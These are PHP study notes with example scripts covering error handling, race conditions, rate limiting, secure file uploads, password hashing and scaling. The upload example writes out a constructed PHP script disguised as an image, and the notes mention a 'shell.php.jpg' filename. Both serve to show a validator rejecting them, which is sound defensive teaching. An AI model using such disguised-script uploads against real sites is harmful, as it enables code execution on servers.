__clone(): Triggered when the object is cloned using the clone keyword. Allows defining custom behavior for when objects are cloned, like deep copying.
__invoke(): Called when a script tries to call an object as a function. Makes an object callable, which can be handy for creating single-method objects or functors.
__set_state(): Used for classes exported using var_export(). Allows initialization of properties for objects being restored from the exported code.
__sleep() and __wakeup(): Used for serialization and deserialization respectively. Customizes the serialization process, determining which properties to save, and initializing resources upon deserialization. Since PHP 7.4, __serialize()/__unserialize() are preferred. Never unserialize() untrusted input: magic methods such as __wakeup and __destruct on attacker-chosen classes are how PHP object injection works; use json_decode(), or pass allowed_classes to unserialize().
__debugInfo(): Called by var_dump() when dumping an object. Customizes the properties displayed, useful for hiding secrets or computing debug information.
More
Run PHP
cli, php built in server, serverless php (aws lambda)
mod_php, apache
cgi: old
hhvm: HHVM is a virtual machine developed by Facebook, PHP community responded with its own performance enhancements, starting with PHP 7.
fast-cgi: for both apache and nginx
php-fpm (fastcgi process manager): A PHP FastCGI implementation containing some features (mostly) useful for heavy-loaded sites.
swoole, roadrunner. RoadRunner includes PSR-7/PSR-17 compatible HTTP and HTTP/2 server and can be used to replace classic Nginx+FPM setup with much greater performance and flexibility.
PHP worker
Definition: A process or thread dedicated to executing PHP scripts.
PHP workers are background processes on servers that run PHP code.
"How to tune the number of PHP-FPM child processes": as many as fit in memory. Roughly pm.max_children = (RAM available for PHP) / (average worker RSS, measured under load), leaving headroom for the web server, database and OS cache.
Too Few Workers: If you have more incoming requests than available workers, the excess requests queue up waiting for a free worker, leading to slower response times (and 502/504s when the listen backlog is full).
Too Many Workers: Conversely, too many workers means excessive memory usage, as each worker consumes memory; the host starts swapping or the OOM killer steps in.
It's crucial to avoid long-running tasks because they can tie up a worker, making it unavailable to handle other incoming requests. For long-running tasks, it's a good idea to offload them to a background process or a task queue system like RabbitMQ
PHP stream
PHP streams provide a way to access resources, whether they are files, network resources, or even data in memory, through a consistent and unified interface.
1. Basics of PHP Streams:
Resources: In PHP, a stream is represented by a "resource" data type. When you open a file or establish a network connection, PHP returns a resource that you can operate on using various stream functions.
Wrappers: Wrappers are additional layers around streams that provide access to specific protocols or features: "file://", "http://", "ftp://", "php://", "data:", "phar://". allow_url_fopen and allow_url_include control whether the remote ones can be opened or included; keep allow_url_include off.
2. Common Uses of Streams:
File Access: The most common use of streams in PHP is file access. Functions like fopen(), fread(), and fwrite() use streams.
Memory Access: PHP provides "php://memory" and "php://temp" streams that let you treat memory (or temporary file storage) as a stream, useful for operations that need an in-memory buffer.
Network Access: You can also use streams to access network resources. For instance, file_get_contents("http://example.com") fetches a web page.
You can attach a context to a stream to configure its behaviour (e.g. set the HTTP method or TLS options with stream_context_create()) and filter the data, e.g. stream_filter_append($file, "string.toupper").
Variable types
Scalar Types: Booleans, integers, floats, strings
Compound Types: Array, objects, callable, iterable
Special Types:
Resource: Holds a reference to an external resource, such as a file handle, database connection, etc.
NULL
Pseudo-Types:
Used in the PHP documentation to specify types in contexts where a single type does not tell the full story. Examples include mixed (can be any type), number (int or float), and callback (any callable).
Types of errors:
Parse Error (Syntax Error), compile error:
These are caused by invalid code syntax, e.g. a forgotten ";".
Hierarchy: Throwable > Error > CompileError > ParseError. A parse error in the main script stops PHP before anything runs; only code loaded at run time (eval, include) can be caught.
Fatal Error:
Can't execute the code, e.g. calling an undefined function.
Since PHP 7 most of these are thrown as Error subclasses (Error, TypeError, ArgumentCountError, ArithmeticError, ...), all under Throwable, so they can be caught; uncaught, PHP stops.
Warning Error:
Can execute the code.
Referring to a file that does not exist.
Notice Error:
These are minor errors
Notices often indicate bad practices, which might not necessarily break the script but could lead to bugs.
It's worth noting that before PHP 7, fatal errors were handled differently: they were reported and halted the script, but could not be caught with try/catch. Warnings and notices are still not exceptions; use set_error_handler() to convert them (e.g. into ErrorException).
There are sixteen different error levels (i.e. types) available in PHP:
E_ERROR, E_WARNING, E_PARSE, E_NOTICE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR, E_COMPILE_WARNING, E_USER_ERROR, E_USER_WARNING, E_USER_NOTICE, E_STRICT (deprecated in PHP 8.4), E_RECOVERABLE_ERROR, E_DEPRECATED, E_USER_DEPRECATED, E_ALL
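The Throwable hierarchy in practice, and the warning-to-exception conversion mentioned above, as an added example that is not part of the original notes. The cases array and the nonexistent path are constructed:

```php
<?php
declare(strict_types=1);

// Added example: catching Error vs Exception, and promoting warnings to
// exceptions so failures cannot be silently ignored. Inputs are constructed.

// Warnings and notices are not Throwable; an error handler can promote them.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    if (!(error_reporting() & $severity)) {
        return false;   // respect the @ operator and error_reporting() mask
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
});

function add(int $a, int $b): int
{
    return $a + $b;
}

$cases = [
    // TypeError: an Error (not an Exception) raised at run time under strict_types.
    'type'      => fn() => add('1', 2),
    // Error: undefined function; fatal in PHP 5, catchable since PHP 7.
    'undefined' => fn() => undefined_function_xyz(),
    // E_WARNING from file_get_contents, turned into ErrorException above.
    'warning'   => fn() => file_get_contents('/nonexistent/' . bin2hex(random_bytes(4))),
    // DivisionByZeroError: an ArithmeticError, itself an Error.
    'divzero'   => fn() => intdiv(1, 0),
    // Ordinary Exception.
    'exception' => fn() => throw new RuntimeException('business rule violated'),
];

foreach ($cases as $label => $case) {
    try {
        $case();
    } catch (TypeError $e) {
        echo "$label -> TypeError: ", $e->getMessage(), "\n";
    } catch (ErrorException $e) {
        echo "$label -> warning promoted: ", $e->getMessage(), "\n";
    } catch (Error $e) {                 // any remaining Error subclass
        echo "$label -> ", get_class($e), ': ', $e->getMessage(), "\n";
    } catch (Exception $e) {
        echo "$label -> Exception: ", $e->getMessage(), "\n";
    }
}

// ParseError (a CompileError) is Throwable too, but only catchable when the
// broken code is loaded at run time; a parse error in this file itself
// would stop PHP before the first line executed.
try {
    eval('echo "missing semicolon"');
} catch (ParseError $e) {
    echo 'eval -> ParseError: ', $e->getMessage(), "\n";
}

restore_error_handler();
```

Catch order matters: TypeError and ErrorException must come before their parents Error and Exception, otherwise the specific branches are unreachable. Catching Throwable at the top of a request handler is how frameworks turn any of these into a clean 500 response without leaking stack traces.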
Lazy loading in php
Design pattern in software development where the initialization or instantiation of an object, or the loading of resources, is deferred until it is actually needed.
Common use cases
Database Interaction:
ORM libraries like Doctrine for PHP offer lazy loading for related database entities. If you access an entity's relation (like $post->getComments()), only then will the comments be fetched from the database.
Object Instantiation:
Instead of creating all objects when the application starts, objects are created only when they are actually accessed.
Autoloading:
PHP's class autoloading mechanism is inherently lazy. Instead of including all class files at the beginning of a request, class files are loaded automatically when a class is used for the first time. This is typically set up using spl_autoload_register().
Race condition problem
A race condition is a situation where the behavior of a system depends on the relative timing of events
In the context of PHP, each request runs in its own single-threaded process, but many requests run concurrently (several FPM workers, several servers), so race conditions most commonly occur on shared storage: files, database rows, caches, and "check then act" sequences such as checking stock and then decrementing it.
Avoiding Race Conditions
Locking
Atomic Operations: Use operations that combine reading and writing into a single uninterruptible step. Many databases provide atomic operations.
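A "check then act" race and its two fixes from the list above (an exclusive lock, and pushing the update into an atomic database operation), as an added example that is not part of the original notes. The counter file and the stock table are constructed for the demo:

```php
<?php
declare(strict_types=1);

// Added example: read-modify-write race, then flock() and an atomic UPDATE.
// File path and stock table are constructed for the demo.

$file = sys_get_temp_dir() . '/counter_' . bin2hex(random_bytes(4)) . '.txt';
file_put_contents($file, '0');

// RACY: two FPM workers can both read 5 and both write 6 (lost update).
function incrementRacy(string $file): int
{
    $n = (int) file_get_contents($file) + 1;
    file_put_contents($file, (string) $n);
    return $n;
}

// LOCKED: the whole read-modify-write happens under an exclusive advisory lock,
// so concurrent callers serialise instead of overwriting each other.
function incrementLocked(string $file): int
{
    $fh = fopen($file, 'c+');
    try {
        if (!flock($fh, LOCK_EX)) {
            throw new RuntimeException('could not acquire lock');
        }
        $n = (int) stream_get_contents($fh) + 1;
        ftruncate($fh, 0);
        rewind($fh);
        fwrite($fh, (string) $n);
        fflush($fh);
        flock($fh, LOCK_UN);
        return $n;
    } finally {
        fclose($fh);
    }
}

// ATOMIC: the arithmetic and the guard run inside one statement in the database,
// so there is no window between the check and the write (no double-spend).
function reserveStock(PDO $pdo, int $productId, int $qty): bool
{
    $stmt = $pdo->prepare(
        'UPDATE stock SET qty = qty - :q WHERE product_id = :id AND qty >= :min'
    );
    $stmt->execute([':q' => $qty, ':id' => $productId, ':min' => $qty]);
    return $stmt->rowCount() === 1;   // 0 rows: another request got there first
}

echo 'locked increments: ', incrementLocked($file), ', ', incrementLocked($file), "\n";

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE stock (product_id INTEGER PRIMARY KEY, qty INTEGER NOT NULL)');
$pdo->exec('INSERT INTO stock VALUES (1, 1)');   // exactly one item left
echo 'first buyer:  ', reserveStock($pdo, 1, 1) ? 'reserved' : 'sold out', "\n";
echo 'second buyer: ', reserveStock($pdo, 1, 1) ? 'reserved' : 'sold out', "\n";

unlink($file);
```

flock() is advisory and per host; across several servers use the database (the atomic UPDATE, SELECT ... FOR UPDATE, or a unique constraint) or a distributed lock such as Redis SET NX with an expiry. The racy version is shown only for contrast.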
API
Api versioning
Options: version in the URL path, in a custom header, in the Accept media type, in a query parameter, or on a separate host. Providing SDKs makes upgrades easier for clients.
Rate limit
Rate limiting is essential to protect your PHP applications from abuse, mitigate DDoS attacks, and ensure fair usage.
Can limit by ip, user account, api token. Per minute, per hour,
Implement it as a middleware that counts hits in Redis or APCu. Use HTTP headers to inform the client (X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Reset) and respond with 429 Too Many Requests (plus Retry-After) when the limit is exceeded.
API Rate Limiting: Restricts the number of API requests a user can make in a given time period to prevent overuse of resources.
Throttling: Dynamically controls the rate of API requests based on current system load or user-specific limits to maintain server performance and reliability.
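A fixed-window rate limiter with the headers and 429 response described above, written as an added example (not code from the original notes). The storage interface and class names are constructed; the array store exists so the demo runs offline, while the APCu store shows how the same logic is backed by the shared cache in production:

```php
<?php
declare(strict_types=1);

// Added example: fixed-window rate limiter behind a storage interface.
// Interface and class names are constructed for this illustration.

interface CounterStore
{
    /** Increment $key (creating it with the TTL if absent) and return the new count. */
    public function increment(string $key, int $ttlSeconds): int;
}

// In-memory store for tests and this demo.
final class ArrayCounterStore implements CounterStore
{
    private array $counts = [];

    public function increment(string $key, int $ttlSeconds): int
    {
        $this->counts[$key] = ($this->counts[$key] ?? 0) + 1;
        return $this->counts[$key];
    }
}

// Production store shared by all workers of the FPM pool.
final class ApcuCounterStore implements CounterStore
{
    public function increment(string $key, int $ttlSeconds): int
    {
        apcu_add($key, 0, $ttlSeconds);      // no-op if the key already exists
        $count = apcu_inc($key);             // atomic increment
        return $count === false ? 1 : $count;
    }
}

final class RateLimiter
{
    public function __construct(
        private CounterStore $store,
        private int $limit,
        private int $windowSeconds,
    ) {}

    /** @return array{allowed: bool, headers: array<string, string>} */
    public function hit(string $client, int $now): array
    {
        $window    = intdiv($now, $this->windowSeconds);
        $resetAt   = ($window + 1) * $this->windowSeconds;
        $count     = $this->store->increment("rl:$client:$window", $this->windowSeconds);
        $remaining = max(0, $this->limit - $count);
        return [
            'allowed' => $count <= $this->limit,
            'headers' => [
                'X-RateLimit-Limit'     => (string) $this->limit,
                'X-RateLimit-Remaining' => (string) $remaining,
                'X-RateLimit-Reset'     => (string) $resetAt,
            ],
        ];
    }
}

// Middleware-style use: decide before the controller ($next) runs.
function rateLimitMiddleware(RateLimiter $limiter, string $clientKey, callable $next): string
{
    $result = $limiter->hit($clientKey, time());
    foreach ($result['headers'] as $name => $value) {
        header("$name: $value");
    }
    if (!$result['allowed']) {
        http_response_code(429);
        header('Retry-After: ' . max(1, (int) $result['headers']['X-RateLimit-Reset'] - time()));
        return 'Too Many Requests';
    }
    return $next();
}

// Demo: 3 requests per 60-second window from one API token, fixed clock.
$limiter = new RateLimiter(new ArrayCounterStore(), 3, 60);
for ($i = 1; $i <= 4; $i++) {
    $r = $limiter->hit('token:abc123', 1_700_000_000);
    echo "request $i: ", $r['allowed'] ? 'allowed' : '429', ', remaining=', $r['headers']['X-RateLimit-Remaining'], "\n";
}
```

Key the counter on the authenticated user or API token where possible; client IP alone is both unfair (NAT, corporate proxies) and spoofable if you trust X-Forwarded-For from untrusted hops. A sliding window or token bucket smooths the burst a fixed window allows at each boundary.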
Sync vs Async php
Synchronous
Sequential Execution: Each line of code waits for the previous line to complete before it starts.
Blocking: If a line of code (e.g., a database query) takes a long time, the entire script waits for it to finish.
Benefits: simple and consistent
Caveats: Performance, scalability
Asynchronous
Concurrent Execution: Multiple tasks can be initiated and run concurrently, without waiting for each one to finish.
Non-Blocking: Code can initiate a task (like an HTTP request) and then move on to other tasks without waiting for the first task to complete.
Benefits: performance and scalability
Caveats: Complexity, error handling
Examples: ReactPHP, Swoole
When to Use Which?
Synchronous when you have a traditional web application, where the majority of the workload is CPU-bound (processing data, rendering templates) rather than I/O-bound.
Use Asynchronous PHP when you have I/O-bound tasks that can run concurrently, such as: Apis, chats
More (superglobals, @, PDO, storing sensitive info, backward compatibility, SPL, common bottlenecks, best practices, scaling)
Superglobals:
Built-in arrays that provide a way to access information about the environment, input data, and other external factors regardless of the scope.
$GLOBALS, $_SERVER, $_GET, $_POST, $_FILES, $_COOKIE, $_SESSION, $_REQUEST, $_ENV,
@ meaning
The @ symbol is the error control operator. When prepended to an expression, any diagnostics (warnings, notices) that expression would emit are not reported. Since PHP 8.0, @ no longer silences fatal errors.
$result = @file_get_contents('nonexistentfile.txt');
Avoid it: it hides real failures and makes debugging harder. Check the return value and use exception handling with try/catch (or an error handler that converts warnings into ErrorException) instead.
How can you ensure backward compatibility when updating a PHP library or package for public use?
Ensuring backward compatibility (BC) when updating a PHP library or package, especially one used by many others, is critical to prevent disruptions for its users. Here are some guidelines and best practices to follow:
Semantic Versioning (SemVer): Adopt Semantic Versioning. A breaking change should result in a major version bump. Minor and patch version increases should remain backward compatible.
Deprecate Before Removal: If you need to remove a function, method, or class, deprecate it first and only remove it in the next major release. Provide clear warnings about the deprecation.
Document Changes, Automated Tests, composer…
PDO, or PHP Data Objects, is a database access layer that provides a consistent interface for accessing databases. It's a set of classes and interfaces that abstract database access, allowing developers to use the same PHP code to manage different types of databases.
Doctrine uses it
Similar to mysqli but DB agnostic
Timezone: If date.timezone is not set in php.ini, PHP uses UTC regardless of the server's timezone; set it explicitly (ini or date_default_timezone_set()) and store timestamps in UTC.
php buffering: Buffering in PHP refers to the process of storing output in memory (a buffer) before sending it to the client or the browser.
How would you handle sensitive information, like API keys, in a PHP application?
store them outside the code base and out of version control: environment variables or .env files that are never committed and never served from the web root
rotate API keys regularly and immediately on suspicion of exposure
encrypt sensitive data at rest (database columns, backups) and in transit
use a secrets manager (Docker/Kubernetes secrets, Vault, a cloud KMS) rather than config files on disk where possible; never write secrets to logs
File uploads: limit file types (sniff the content, never trust the client's extension or MIME type) and size, use random server-generated names, store them outside the document root or on a separate server/bucket, and serve them through a handler with a fixed Content-Type and X-Content-Type-Options: nosniff
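The upload rules above as an added example (not code from the original notes): content-sniffed type check, size limit, random server-chosen name, storage outside the web root, and a download handler. The directory, the allowed-type map and the two sample files (a minimal PNG and a PHP script) are constructed so the validation can run offline:

```php
<?php
declare(strict_types=1);

// Added example: upload validation and storage. UPLOAD_DIR, ALLOWED_MIME and
// the sample files are constructed for the demo.

const UPLOAD_DIR   = '/var/app/uploads';   // assumption: outside the document root
const MAX_BYTES    = 2 * 1024 * 1024;
const ALLOWED_MIME = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'application/pdf' => 'pdf'];

/** Validates the stored bytes and returns the server-chosen extension. */
function validateUpload(string $tmpPath, int $size): string
{
    if ($size > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the actual bytes; the client-supplied name and MIME type are untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_MIME[$mime])) {
        throw new RuntimeException('disallowed content type ' . var_export($mime, true));
    }
    return ALLOWED_MIME[$mime];
}

/**
 * @param array{name:string,type:string,tmp_name:string,error:int,size:int} $file one $_FILES entry
 * @return string stored file name: random, with an extension chosen by the server
 */
function storeUpload(array $file, string $dir = UPLOAD_DIR): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $file['error']);
    }
    // Only accept files that arrived through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $ext = validateUpload($file['tmp_name'], $file['size']);
    // The original name (e.g. shell.php.jpg) never touches the disk.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $stored)) {
        throw new RuntimeException('could not move file');
    }
    return $stored;
}

// Serve through PHP so the upload directory is never fetched directly and the
// browser treats the bytes as a download, not as a page to render.
function sendUpload(string $stored, string $dir = UPLOAD_DIR): void
{
    if (!preg_match('/\A[a-f0-9]{32}\.(jpg|png|pdf)\z/', $stored)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $stored . '"');
    header('X-Content-Type-Options: nosniff');
    readfile("$dir/$stored");
}

// Demo of the validation step with constructed files (no real HTTP upload here).
$png = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($png, "\x89PNG\r\n\x1a\n" . "\x00\x00\x00\x0dIHDR" . pack('N2', 1, 1)
    . "\x08\x02\x00\x00\x00" . "\x00\x00\x00\x00");
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php phpinfo();");

foreach (['image' => $png, 'script renamed to .jpg' => $php] as $label => $path) {
    try {
        echo "$label: accepted as .", validateUpload($path, filesize($path)), "\n";
    } catch (RuntimeException $e) {
        echo "$label: rejected (", $e->getMessage(), ")\n";
    }
    unlink($path);
}
```

If the upload directory must live under the web root, also disable script execution there (an .htaccess with php_flag engine off, or an nginx location that never passes to FPM); the random name alone does not stop execution of a file the server will happily interpret.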
How would you handle long-running processes in PHP, like generating large reports or processing bulk data? Push them to a queue worker (RabbitMQ, php-resque, Symfony Messenger), run them from the CLI, or schedule them with cron; never inside a web request.
Describe the lifecycle of a PHP request: HTTP request arrives at the web server, is handed to PHP (mod_php or PHP-FPM), the script is compiled to opcodes (or taken from OPcache), the opcodes are executed, output is generated and buffered, then sent back to the client; request-scoped memory is released.
What are the common performance bottlenecks in PHP applications?
Database: slow queries, too many queries (fix with eager loading or batch operations), missing indexes
Api calls, file system operations, memory usage (large datasets), lack of caching, network latency
Env variables: serve as a mechanism to inject external configurations into an application, thereby decoupling configuration from code. This decoupling provides several advantages in security, flexibility, scalability (aws, kubernetes..)
What is a polyfill? Piece of code that provides modern functionality on older environments that do not natively support it.
SPL: (Standard PHP Library) is a collection of interfaces, classes, and functions that are bundled with PHP and are aimed at solving common problems.
Here are some of the primary features and components of the SPL:
Data Structures: SplStack, SplQueue, SplHeap, SplMaxHeap, SplMinHeap, SplFixedArray, SplDoublyLinkedList, SplObjectStorage
Iterators: DirectoryIterator, ArrayIterator, RecursiveArrayIterator, FilterIterator, LimitIterator, CachingIterator
Exceptions: SPL provides a set of standard exception classes (LogicException, InvalidArgumentException, RuntimeException, OutOfBoundsException, ...) that can be used or extended for better exception handling in applications.
File Handling: Classes for dealing with file systems and file objects: SplFileInfo, SplFileObject, SplTempFileObject.
And more
PHP best practices
Coding standards, static analysis like PHPStan or Psalm (type checks, undefined variables, taint analysis), linters (code style), unit testing (PHPUnit), CI/CD, code review, documentation
Scaling
Vertical (bigger server: more CPU/RAM) vs Horizontal (add servers behind a load balancer; requires shared or stateless sessions)
Bottleneck and profiling
Solutions: caching, connection pooling, parallelization, partitioning (keep related processes and data close together)
Caching, database (indexing, query, caching, replication, sharding), profiling, cdns, load balancing, ,horizontal scaling, microservices
Sharding distributes data across multiple servers, while partitioning splits tables within one server. Both split the data by ranges, regions, lists.. In many cases, the terms sharding and partitioning are even used synonymously,
Logging and monitoring: Monolog, sentry, new relic, datadog, kibana
PEAR, was instrumental in the early days of PHP for distributing and managing reusable PHP components.
Constants
Constants are case sensitive and immutable once defined.
Global space:
define("CONSTANT_NAME", "Value");
const CONSTANT_NAME = "Value";
echo CONSTANT_NAME;
In classes: const NAME = 'value'; accessed as ClassName::NAME (with visibility modifiers since PHP 7.1 and final since 8.1).
Hashing
Hashing is a one-way process that converts data (like a string) into a fixed-length value that appears random; the same input always gives the same hash, and it should be infeasible to recover the input or find two inputs with the same hash.
For passwords, use a slow, salted algorithm via password_hash()/password_verify() (bcrypt or Argon2id), never MD5 or plain SHA-*. When a user logs in, the system hashes the entered password and compares it to the stored hash; the plaintext is never stored. For integrity checks and token comparison use hash_hmac() and hash_equals().
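Password storage with the built-in API, including transparent upgrade of hashes made with an outdated algorithm or cost, as an added example that is not part of the original notes. The user records and passwords are constructed:

```php
<?php
declare(strict_types=1);

// Added example: password_hash()/password_verify() with rehash-on-login.
// User rows and passwords are constructed for the demo.

function passwordAlgo(): string
{
    // Argon2id (memory-hard) when the build supports it, otherwise bcrypt.
    return defined('PASSWORD_ARGON2ID') ? PASSWORD_ARGON2ID : PASSWORD_BCRYPT;
}

function hashPassword(string $plain): string
{
    // password_hash generates a random salt and embeds algorithm, parameters
    // and salt in the returned string, so nothing else needs to be stored.
    return password_hash($plain, passwordAlgo());
}

/**
 * Verifies $plain against $storedHash. On success, if the stored hash uses an
 * outdated algorithm or cost, $rehash receives a fresh hash the caller must persist.
 */
function checkPassword(string $plain, string $storedHash, ?string &$rehash): bool
{
    $rehash = null;
    if (!password_verify($plain, $storedHash)) {   // constant-time internally
        return false;
    }
    if (password_needs_rehash($storedHash, passwordAlgo())) {
        $rehash = hashPassword($plain);
    }
    return true;
}

// Constructed user table: alice is current; bob's hash was made with a
// deliberately weak bcrypt cost and should be upgraded on next login.
$users = [
    'alice' => hashPassword('correct horse battery staple'),
    'bob'   => password_hash('hunter2', PASSWORD_BCRYPT, ['cost' => 4]),
];

foreach ([['alice', 'correct horse battery staple'], ['alice', 'wrong password'], ['bob', 'hunter2']] as [$user, $attempt]) {
    $ok = checkPassword($attempt, $users[$user], $rehash);
    echo "$user: ", $ok ? 'login ok' : 'login failed';
    if ($ok && $rehash !== null) {
        $users[$user] = $rehash;       // persist the upgraded hash
        echo ' (hash upgraded: ', password_get_info($rehash)['algoName'], ')';
    }
    echo "\n";
}
```

Returning the same generic failure message for "unknown user" and "wrong password", and running password_verify against a dummy hash when the user does not exist, keeps response timing from revealing which accounts are valid.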
Type casting and juggling
Casting is explicit: (int) "42", (string) 3.14, intval(), settype(). Juggling is PHP converting types implicitly when an operator or function expects another type ("10" + 5 gives 15). Use === and declare(strict_types=1) to avoid surprises such as loose comparisons between strings and numbers (whose rules changed in PHP 8: "abc" == 0 is now false).
Front controller pattern: software design pattern often used in web applications. It provides a centralized entry point for handling requests
A private method ensures that if you change it, the only code affected is in the same class.
$ vs $$: $name is a variable; $$name is a variable variable, i.e. the variable whose name is the string held in $name. Never build it from user input: it can overwrite arbitrary variables (the same class of bug as register_globals).
Variable scopes
Local, global, static
Context within which they can be accessed or modified.
Local Scope:
Global Scope:
A variable declared outside a function has GLOBAL scope and can be accessed outside the function but not inside it unless imported with the global keyword (or read via $GLOBALS).
Static Scope:
Inside a function, the static keyword declares a static variable. Unlike regular local variables, a static variable retains its value between function calls.
FFI: an extension (PHP 7.4+) that allows you to call functions and use data types defined in C libraries directly from PHP code. Caveat: FFI code has no memory safety; a wrong type, size or pointer corrupts the PHP process. The default ffi.enable=preload only permits FFI from preloaded files, keeping it out of request-time code.
Benefits:
Performance: Instead of writing an entire PHP extension in C, developers can leverage existing C libraries directly from PHP, which can lead to performance improvements.
Reusability: Existing C libraries and functions can be reused without the need to write wrappers or reimplement them in PHP.
Flexibility: Allows PHP to interface with lower-level systems, opening up possibilities for integrating with a wider range of systems and technologies.
::
Accessing Static Methods and Properties
Accessing Class Constants
Referencing Overridden Parent Class Members
When overriding class methods in a child class, you can call the parent class's version with parent::method(); self:: refers to the class where the code is written and static:: to the late-bound (runtime) class.
Middleware
Software that sits between two or more systems/APIs, or between the HTTP request and the controller (PSR-15 defines the standard interfaces).
In Symfony you can implement it by decorating services, or as kernel event listeners; Messenger has its own middleware stack.
example
New in symfony 5.1
Middleware vs Events
Middleware: Linear execution flow in a fixed order. Used for authentication, logging, rate limiting, input validation. Usually invoked before the request reaches the primary application logic (controllers), and can short-circuit the response.
Events: Allow a decoupled architecture. Sending emails, triggering background jobs, updating related data after user registration or after a post is saved. Multiple listeners can react to one event, and the emitter does not know who listens.